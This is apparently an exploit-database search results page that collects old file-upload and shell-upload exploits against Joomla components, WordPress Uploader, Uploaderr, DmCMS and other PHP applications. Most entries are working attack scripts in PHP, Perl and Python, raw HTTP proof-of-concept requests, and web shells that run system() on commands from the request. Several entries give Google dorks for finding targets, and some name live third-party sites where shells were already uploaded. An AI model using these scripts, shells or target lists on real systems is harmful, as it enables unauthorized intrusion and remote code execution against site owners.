exploit joomla cache upload
Search result for 'exploit joomla cache upload'
(0.0400550365448 seconds)
Sammy FORGIT/Joomla DentroVideo 1.2 Shell Upload ( na)
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Sammy FORGIT member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : Joomla Components - DentroVideo Arbitrary File Upload
Vulnerability
# Version : 1.2
# Link : http://www.dentrovideo.com/en.html
# Software : http://dentrovideo.com/com_dv.last.tar.gz
# Date : 08-06-2012
# Google Dork : inurl:/components/com_dv/externals
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr -
http://www.opensyscom.fr
##################################################
Exploit 1 :
PostShell.php
<?php
$uploadfile="lo.php";
$ch =
curl_init("http://www.exemple.com/components/com_dv/externals/phpupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file1'=>"@$uploadfile",
'action'=>'upload'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/lo.php
lo.php
<?php
phpinfo();
?>
Exploit 2 :
PostShell2.php
<?php
$uploadfile="lo.php.mpg3";
$ch =
curl_init("http://www.exemple.com/components/com_dv/externals/swfupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/dvvideos/uploads/originals/lo.php.mpg3
lo.php.mpg3
<?php
phpinfo();
?>
# Site : 1337day.com Inj3ct0r Exploit Database
Joomla DentroVideo component version 1.2 suffers from a remote shell upload vulnerability.
Al-Ghamdi/Joomla jDownloads 1.0 Shell Upload ( na)
____________________________________________________________________
____________________________________________________________________
-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-
[~] Exploit Title: [jDownloads 1.0 Remote File Upload Vulnerability]
[~] Found By: Al-Ghamdi
[?] Contact: by-root@hotmail.com
[?] Date: 18.5.20ll
[?] Home: in my home
[~] Software Link: [http://www.jdownloads.com/index.php?option=com_jdownloads&Itemid=133&task=view.download&catid=22&cid=234]
[~] Version: Version:1.0
[~] Dork : "Powered by jDownloads"
____________________________________________________________________
____________________________________________________________________
Exploit :
# Open Site ..
# Register [When required you to register]..
# Go to : [Submit file] ..
# Make Shell format like [shell.php.jpg] ..
# Then Upload your Shell ..
# You will see the path of your shell ..
# Example http://www.site.com/public-relations/testimonials
# Example http://www.site.com/index.php?/component/option,com_jdownloads/Itemid,70/task,view.upload/
(+)Gr33ts to : Only my God [ Allah ] ..
____________________________________________________________________
____________________________________________________________________
Joomla jDownloads component version 1.0 suffers from a shell upload vulnerability.
r3dm0v3/Uploaderr Arbitrary File Upload ( na)
#!/usr/bin/perl
#################################################################
#Title: Uploaderr Remote Arbitrary File Upload Exploit #
# #
#Credit: r3dm0v3 #
# http://r3dm0v3.persianblog.ir #
# r3dm0v3[4t]yahoo[dot]com #
# Tehran - Iran #
# #
#Vendor: http://www.uploaderr.com/ #
#Price: 9.95$ #
#Remote: Yes #
#Dork: "Powered by Uploaderr" #
#Fix: Not Available #
# #
#Special thx: Neo limpizik_neo[4t]yahoo[dot]com #
#################################################################
$maxfilesize=250000;
$port=80;
use IO::Socket;
&Banner();
if (@ARGV < 2) {
&Usage();
exit(1);
}
$path = $ARGV[0];
if (substr($path,length($path)-1,1) ne "/"){
$path.="/";
}
$url=$path;
if (lc($url)=~/http:\/\//){
lc($url) =~ /http:\/\/([a-zA-Z0-9.\/_-]+)/;
$url= $1;
}
else{
$url =~ /([a-zA-Z0-9.\/_-]+)/;
$url= $1;
}
$url =~ /([a-zA-Z0-9-_.]+)/;
$host=$1;
$url=~s/$host//;
$file=$ARGV[1];
print "[+] Connecting to $host\n";
open(FILETOUPLOAD,$file) || die "Can not open the file: $!\n";
@filecontent=<FILETOUPLOAD>;
close(FILETOUPLOAD);
$content="-----------------------------7d92ce322fc0564\n".
"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\n\n".
$maxfilesize."\n".
"-----------------------------7d92ce322fc0564\n".
"Content-Disposition: form-data; name=\"userfile\"; filename=\"".$file."\"\n".
"Content-Type: image/jpeg\n\n".
"@filecontent\n".
"-----------------------------7d92ce322fc0564\n".
"Content-Disposition: form-data; name=\"upload\"\n\n".
"true\n".
"-----------------------------7d92ce322fc0564\n".
"Content-Disposition: form-data; name=\"submitbutton\"\n\n\n".
"-----------------------------7d92ce322fc0564--\n";
$req="POST ".$url."upload.php HTTP/1.1\n".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\n".
"Content-Type: multipart/form-data; boundary=---------------------------7d92ce322fc0564\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\n".
"Host: ".$host."\n".
"Content-Length: ".length($content)."\n".
"Connection: Close\n".
"Cache-Control: no-cache\n\n".
$content;
$connect = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp") || die "Cannot connect to $host: $!\n";
print $connect $req;
while (<$connect>) {
$response.=$_;
}
$response=~ /.+input onclick="javascript:this\.select\(\);" type="text" value="([a-zA-Z0-9.\/:_-]+)" readonly.+/;
$uploadedFile=$1;
if ($uploadedFile){
print "[+] File uploaded: ".$uploadedFile."\n";
}else{
print "[!] Failed.\n";
}
sub Banner{
print "############################################################\n".
"# Uploaderr Remote Arbitrary File Upload Exploit #\n".
"# by r3dm0v3 #\n".
"# r3dm0v3[4t]yahoo[.]com #\n".
"# http://r3dm0v3.persianblog.ir #\n".
"############################################################\n";
}
sub Usage(){
print "\n Usage: uploaderr.pl <host&path> <local_file>\n";
print " ex. : uploaderr.pl site.com/upload/ shell.php\n";
}
Uploaderr remote arbitrary file upload exploit.
gmda/Joomla Simple File Upload 1.3 Remote Code Execution ( na)
<?PHP
/*
--------------------------------------------------------------------------------
Title: Simple File Upload v1.3 (module for joomla) Remote Code Execution Exploit
--------------------------------------------------------------------------------
Author...............: gmda
Google Dork..........:"Simple File Upload v1.3" "Powered by Joomla"
Mail.................: gmda[at]email[dot]it
Site.................: http://www.gmda.altervista.org/
Date.................: 26/12/2011
Software Link: http://wasen.net/downloads/mod_simpleFileUpload.1.3.zip
Version: 1.3
Tested on: winxp php version 5.3.2 Apache 2.0
*the setup of the module is no captcha other setups are the default*
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
The vulnerability is closed to transmit malformed packets to the server that he still plays and saves in his belly.
This thing can be a bad intent to send commands to the server running clearly causing safety problems ........
The script has peroblemi upload quality control .....
*/
$host="127.0.0.1";
$port=80;
$shell="R0lGOC8qLyo8P3BocCBwYXNzdGhydSgnY2FsYycpPz4vKg==";
$ContentType="image/gif";
$post="POST http://$host/Joomla_1.5.23_ita-Stable_test_expl/index.php";
$fp = fsockopen($host, $port, $errno, $errstr, 30);
$filename="file.php5";
if(!$fp) die($errstr.$errno); else {
$data="-----------------------------41184676334\r\n";
$data.="Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n";
$data.="\r\n";
$data.="100000\r\n-----------------------------41184676334\r\n";
$data.="Content-Disposition: form-data;name=\"sfuFormFields44\"\r\n";
$data.="\r\n\r\n";
$data.="-----------------------------41184676334\r\n";
$data.="Content-Disposition:form-data; name=\"uploadedfile44[]\"; filename=\"file.php5\"\r\nContent-Type: image/gif\r\n\r\n";
$data.=base64_decode($shell)."\r\n";
$data.="-----------------------------41184676334--\r\n";
$packet="$post HTTP/1.1\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
fwrite($fp, $packet);
fclose($fp);
}
$h = @fopen("http://".$host."/Joomla_1.5.23_ita-Stable_test_expl/images/file.php5", "r");
if ($h) {
while (($buf = fgets($h, 4096)) !== false) {
echo $buf;
echo("exploit was successful");
}
fclose($h);
}else{
echo("Error: exploit fail");
}
?>
The Joomla Simple File Upload component version 1.3 suffers from a remote code execution vulnerability.
Sammy FORGIT/Joomla Dione FileUploader 1.0.1 Shell Upload ( na)
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Sammy FORGIT member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : Joomla Components - Dione FileUploader Arbitrary File
Upload Vulnerability
# Version : 1.0.1
# Link :
http://www.dionesoft.com/solutions/joomlaextensions/dionefileuploader
# Date : 14-06-2012
# Google Dork : inurl:/modules/mod_dionefileuploader/
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr -
http://www.opensyscom.fr
##################################################
Exploit :
PostShell.php
<?php
$uploadfile="lo.php";
$ch =
curl_init("http://www.exemple.com/modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/modules/mod_dionefileuploader/lo.php
lo.php
<?php
phpinfo();
?>
# Site : 1337day.com Inj3ct0r Exploit Database
Joomla Dione FileUploader component version 1.0.1 suffers from a remote shell upload vulnerability.
J3yk0ob/Joomla Component (com_remository) Remote Upload File ( php)
################################################################# # I N F O # # Exploit Title: Joomla com_remository Remote Upload File # Date: 2010-08-26 # Author: J3yk0ob # Home : http://www.J3yk0ob.com # ################################################################# # E X P L O I T # # 1. Register On Site # # 2. http://www.Target.com/index.php?option=com_remository&Itemid=[Itemid]&func=addfile # # 3. Add your php file , example : shell.php # # 4. http://www.Target.com/components/com_remository_files/ # # 5. If web server alowe to see directory you can see folder example : file_image_2 # # 6. You can find your shell in lates file_image_[latest Number] # # 7 . Example URL : http://www.example.com/components/com_remository_files/file_image_14/1276100016shell.php # # Dork : inurl:"index.php?com_remository" # ################################################################# # Contact Me # # Home : http://www.J3yk0ob.com # Email : 4dm1n@J3yk0ob.com # ##################################################################
D4NB4R/Joomla OS Property 2.0.2 Unrestricted File Upload ( php)
_______________________________________________________________________________________
Exploit Title: Joomla com_osproperty Unrestricted File Upload
Google Dork: com_osproperty
Date: [13-07-2012]
Author: Daniel Barragan "D4NB4R"
Twitter: @D4NB4R
site: http://www.insecurityperu.org/ & http://poisonsecurity.wordpress.com/
Vendor: Ossolution Team http://extensions.joomla.org/
Version: 2.0.2 (last update on Jul 12, 2012)
License: Commercial $ 28.86us
Tested on: [Linux(arch)-Windows(7ultimate)]
1. Go to this route
Ingrese a esta ruta
http://site/component/osproperty/?task=agent_register
2. Complete the form, raising the shell.php instead of your photo
Complete el formulario, subiendo la shell.php en lugar de su foto
3. Locate your file in the root /osproperty/agent/
Busque su archivo en la raiz /osproperty/agent/
http://site/images/osproperty/agent/randomid_yourshell.php
Help: This path can help you find your web shell in case you need it
Este path le puede ayudar a encontrar su web shell en caso q lo necesite
component/osproperty/?task=agent_default
Im not responsible for which is given
No me hago responsable del uso que se le de
_______________________________________________________________________________________
Daniel Barragan "D4NB4R" 2012
D4NB4R/Joomla KISS Advertiser Remote File & Bypass Upload Vulnerability ( php)
############################################################################
#
# Exploit Title: Joomla com_KSAdvertiser Remote File & Bypass Upload Vulnerability
#
# Google Dork: inurl:index.php?option=com_ksadvertiser
#
# Date: [12-07-2012]
#
# Author: Daniel Barragan "D4NB4R"
#
# Twitter: @D4NB4R
#
# site: http://www.insecurityperu.org/
#
# vendor Link: http://www.kiss-software.de
#
# Tested on: [Linux(arch)-Windows(7ultimate)]
#
1. Some pages require the Register
Registrese Algunas Paginas lo exigen
http://site/index.php?option=com_user&view=login
2. Go to the upload path
Dirijase a la ruta del upload
http://site/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
3. Go to images and give click to upload, browse your file shell.php, and rename it to shell.php.gif
Vaya a imagenes y dele click a upload, examine su archivo shell.php y renombrelo a shell.php.gif
4. Locate your file in the root / images/ksadvertiser/U0 -> this may vary
Busque su archivo en la raiz /images/ksadvertiser/U0 --> esta puede variar
http://site/images/ksadvertiser/U0/403.php.gif
Im not responsible for which is given
No me hago responsable del uso que se le de
_______________________________________________________________________________________
Daniel Barragan "D4NB4R"
Site: http://www.exploit-db.com // http://packetstormsecurity.org // http://1337day.com/
ViRuSMaN/Joomla Component com_pinboard Remote File Upload Vulnerability ( php)
############################################################## | | Joomla Component [com_pinboard] Remote File Upload Vulnerability | | Author : ViRuSMaN | | Contact : v-.m@live.com | | Home : Islam-Attack.CoM , HackTeach.OrG | ############################################################## | | Dork inurl:com_pinboard | | Exploite : | | 1-target.com/[path]/components/com_pinboard/popup/popup.php?option=showupload | | or | | 2-target.com/[path]/index2.php?option=com_pinboard&Itemid=117&action=popup%22&action=popup&task=uploadForm | | [#] click on the photo in Top Of Left | | [#] upload your shell shell.php.jpg & Confirmer SVP | | [#] Pwd Your Shell | | target.com/[path]/images/stories/pinboard/picture/[name your shell].php.jpg | | Or | | target.com/[path]/strona/components/com_pinboard/pictures/[name your shell].php.jpg | ############################################################## |Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim's ############################################################## # milw0rm.com [2009-06-24]
ZoRLu/phpizabi-upload.txt ( na)
############################################ Powered by PHPizabi v0.848b C1 HFP1 remote file upload author: ZoRLu home: www.yildirimordulari.org contact: trt-turk@hotmail.com dork: "Powered by PHPizabi v0.848b C1 HFP1" ############################################ exploit: http://localhost/izabi/system/cache/pictures/id_shell.php -first register web site -Create an event on the click and create an event ( direct create event url: http://localhost/izabi/?L=events.create ) -event title and description write. show to select All the users. gözat button click and shell.php upload -after go to event page. upload photo right click. open the menu click to properties. copy the url example: http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500 and exploit: http://localhost/izabi/system/cache/pictures/xxx_shell.php example web site: http://bitchinindie.com/system/image.php?file=597_shell.php&width=500 exploit shell.php http://bitchinindie.com/system/cache/pictures/597_shell.php ################################################## thanx: str0ke, FaLCaTa, ReD_KaN, edish, harded, aRKi, z3h!r, the_KaM!L, vur6un, siircicocuk, Dr. SaLTuK, kasýrga(lavrens), avkidis, head_hunter and all users yildirimordulari.org siircicocuk nerelerdesin be kanka msn e takýl özlettin kendini :))) ## yildirimordulari.org açýlýr mý açýlmaz mý orasý bilinmez ama bilinen birþey var o bir efsane ## #################################################
PHPizabi version 0.848b C1 HFP1 suffers from a remote file upload vulnerability.
CWH Underground/andysphpkb-upload.txt ( na)
==============================================================
Andy's PHP Knowledgebase Arbitrary File Upload Vulnerability
==============================================================
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 1 December 2008
SITE : cwh.citec.us
#####################################################
APPLICATION : Andy's PHP Knowledgebase
VERSION : 0.92.9
DOWNLOAD : http://sourceforge.net/project/showfiles.php?group_id=113755
#####################################################
--- Arbitrary File Upload ---
In saa.php page, you can submit an article and attachment file to wait for approval from admin.
Immediately after you submit the article and attachment file, the file has already been on the server without checking file type.
You can upload arbitary file through this form and the url to this file is in authors.php page.
--------
POC
--------
POST /cms/aphpkb/saa.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://127.0.0.1/cms/aphpkb/saa.php?aid=2
Cookie: module=table; PHPSESSID=b311c4f9b1f3ee0c071f33ffd3b3176f
Content-Type: multipart/form-data; boundary=---------------------------22955284022147
Content-Length: 1080
-----------------------------22955284022147
Content-Disposition: form-data; name="title"
PoC Arbitrary File Upload
-----------------------------22955284022147
Content-Disposition: form-data; name="article"
PoC Arbitrary File Upload
-----------------------------22955284022147
Content-Disposition: form-data; name="keywords"
PoC Arbitrary File Upload
-----------------------------22955284022147
Content-Disposition: form-data; name="aid"
2
-----------------------------22955284022147
Content-Disposition: form-data; name="upload"; filename="info.php"
Content-Type: application/octet-stream
<? phpinfo(); ?>
-----------------------------22955284022147
Content-Disposition: form-data; name="description"
PHP File
-----------------------------22955284022147
Content-Disposition: form-data; name="aid"
2
-----------------------------22955284022147
Content-Disposition: form-data; name="a"
-----------------------------22955284022147
Content-Disposition: form-data; name="submit"
Submit/Save
-----------------------------22955284022147--
HTTP/1.x 200 OK
Date: Mon, 01 Dec 2008 05:39:35 GMT
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4578
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
-----------------------------------------------------------------------
Link for uploaded file is in http://[Target]/[aphpkb_path]/authors.php
#######################################################################################
Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################
Andy's PHP Knowledgebase version 0.92.9 suffers from an arbitrary file upload vulnerability.
HACKERS PAL/dmcms-upload.txt ( na)
Hello
Title : DmCMS Shell Upload
Discovered by : HACKERS PAL
Copyrights : HACKERS PAL
Website : WwW.SoQoR.NeT
Email : security@soqor.net
File ..
includes/upload_file.php
After Giving Some conditions will allow you to upload any file you want
the exploit here is the proof ..
exploit :
#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* DmCMS Shell Uploading
/* This exploit should allow you to execute commands
/* By : HACKERS PAL
/* WwW.SoQoR.NeT
*/
echo('
/**********************************************/
/* DmCMS Shell Uploading */
/* by HACKERS PAL <security@soqor.net> */
/* site: http://www.soqor.net */');
if ($argc<4) {
print_r('
/* -- */
/* Usage: php '.$argv[0].' host path topath
/* Example: */
/* php '.$argv[0].' localhost /dmcms/ ../media/
/**********************************************/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
Function get_page($url)
{
if(function_exists("file_get_contents"))
{
$contents = file_get_contents($url);
}
else
{
$fp=fopen("$url","r");
while($line=fread($fp,1024))
{
$contents=$contents.$line;
}
}
return $contents;
}
function connect($packet)
{
global $host, $port, $html;
$con=fsockopen(gethostbyname($host),$port);
if (!$con)
{
echo '[-] Error - No response from '.$host.':'.$port; die;
}
fputs($con,$packet);
$html='';
while ((!feof($con)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($con,1);
}
GLOBAL $html;
fclose($con);
}
$i=0;
$data="";
function add_data($name,$value,$type="no",$filename)
{
GLOBAL $data,$i;
if($type=="file")
{
$data.="-----------------------------7d62702f250530
Content-Disposition: form-data; name=\"$filename\"; filename=\"$name\";
Content-Type: text/plain
$value
";
}
elseif($type=="init")
{
$data.="-----------------------------7d62702f250530--";
}
elseif($type=="clean")
{
$data="";
}
else
{
$data.="-----------------------------7d62702f250530
Content-Disposition: form-data; name=\"$name\";
Content-Type: text/plain
$value
";
}
}
$host=$argv[1];
$path=$argv[2];
$default_path=$argv[3];
$port=80;
$cmd=urlencode($cmd);
$p='http://'.$host.':'.$port.$path;
Echo "\n[+] Trying to Upload File";
$cookie="Master=HACKERS20%PAL";
$contents='<?php
$cmd=($_GET[cmd])?$_GET[cmd]:$_POST[cmd];
system($cmd);
?>';
add_data("empty.php","","file","File1");
add_data("soqor.php",$contents,"file","File2");
add_data("soqor.php",$contents,"file","File3");
add_data('','',"init");
$packet="POST ".$p."includes/upload_file.php?default_path=$default_path HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."ok.php?do=act\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Cookie: ".$cookie."\r\n\r\n";
$packet.=$data;
connect($packet);
if (!eregi($default_path,$html))
{
echo"\n/* [+] Successfully Exploited";
}
echo ("\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");
?>
#WwW.SoQoR.NeT
DmCMS suffers from an upload flaw that allows for arbitrary code execution.
AutoSec Tools/WordPress Uploader 1.0.0 Shell Upload ( na)
# ------------------------------------------------------------------------
# Software................WordPress Uploader 1.0.0
# Vulnerability...........Arbitrary Upload
# Download................http://wordpress.org/extend/plugins/uploader/
# Release Date............1/24/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# ------------------------------------------------------------------------
#
# --Description--
#
# An arbitrary upload vulnerability in WordPress Uploader 1.0.0 can be
# exploited to upload a PHP shell.
#
#
# --PoC--
import socket
host = 'localhost'
path = '/wordpress'
shell_path = '/shell.php'
port = 80
def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send('POST ' + path + '/wp-content/plugins/uploader/uploadify/uploadify.php?folder=/ HTTP/1.1\r\n'
'Host: localhost\r\n'
'Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 193\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
'\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="Filedata"; filename="shell.php"\r\n'
'Content-Type: application/octet-stream\r\n'
'\r\n'
'<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
'------x--\r\n'
'\r\n')
resp = s.recv(8192)
http_ok = 'HTTP/1.1 200 OK'
if http_ok not in resp[:len(http_ok)]:
print 'error uploading shell'
return
else: print 'shell uploaded'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')
if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'
else: print 'shell located at http://' + host + shell_path
upload_shell()
WordPress Uploader plugin version 1.0.0 remote shell upload exploit.
ByALBAYX/Joomla Agora Component 3.0.0 RC1 File Upload ( na)
@~~=======================================~~@
====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG=====
@~~=======================================~~@
@~~=Author : ByALBAYX
@~~=Website : WWW.C4TEAM.ORG
@~~===============TURKISH=================~~@
_.--"""""--._
.' '.
/ \
; C4TEAM ;
| |
| |
; ; ByALBAYX
\ (`'--, ,--'`) /
\ \ _ ) ( _ / / WWW.C4TEAM.ORG
) )(')/ \(')( (
(_ `""` /\ `""` _)
\`"-, / \ ,-"`/
`\ / `""` \ /`
|/\/\/\/\/\|
|\ /|
; |/\/\/\| ;
\`-`--`-`/
\ /
',__,'
@~~=======================================~~@
@~~=Script : Joomla Component Com_Agora 3.0.0 RC1
@~~=S.Site : http://joomlame.com
@~~=Demo : http://joomlame.com/index.php?option=com_agora&task=upload
@~~=======================================~~@
@~~=Bulunan Delik:
@~~=http://c4team.org/ [Yol] /index.php?option=com_agora&task=upload
@~~=http://c4team.org/ [Yol] /components/com_agora/img/members/0/ [Shell.php]
@~~=Arama : "inurl:com_agora"
@~~=http://kht.by.ru/Google.txt
@~~=Vs..
@~~=L!ve Demo:
@~~=http://joomlame.com/index.php?option=com_agora&task=upload
@~~=http://joomlame.com/components/com_agora/img/members/0/xporce.php
@~~=http://dogansar.org/index.php?option=com_agora&task=upload
@~~=http://dogansar.org/components/com_agora/img/members/0/xporce.php
@~~=http://pehlivanlibeldesi.com/index.php?option=com_agora&task=upload
@~~=http://pehlivanlibeldesi.com/components/com_agora/img/members/0/xx_byalbayx.php
@~~=http://sogutluagil.com/index.php?option=com_agora&task=upload
@~~=http://sogutluagil.com/components/com_agora/img/members/0/xporce.php
@~~=Vs..
@~~=======================================~~@
@~~=Haydi Bakalim Baya Site Var iyi bir server denk gelir google moogle cikarda unlu olursunuz :D
@~~=:/
The Joomla Agora component version 3.0.0 RC1 suffers from a remote file upload vulnerability.
Crim3R/Joomla 1.7 / 2.5 Civicrm Arbitrary File Upload ( na)
# Exploit Title: joomla 1.7 & 2.5 (com_civicrm) Arbitrary File Upload Vulnerability # Google Dork: inurl:/components/com_civicrm/ # Date: 08/22/2012 # Author: Crim3R # download Link : http://sourceforge.net/projects/civicrm/files/civicrm-stable/ # Tested on: all ================================== D3m0: http://artistic-webdesign.com/lynda/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/uploadtest.html http://pflagillinois.org/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html http://madacenter.com/mada/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html ===============Crim3R@Att.Net========= $Home = %00 thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir
Joomla versions 1.7 and 2.5 suffers from an arbitrary file upload vulnerability in the Civicrm component.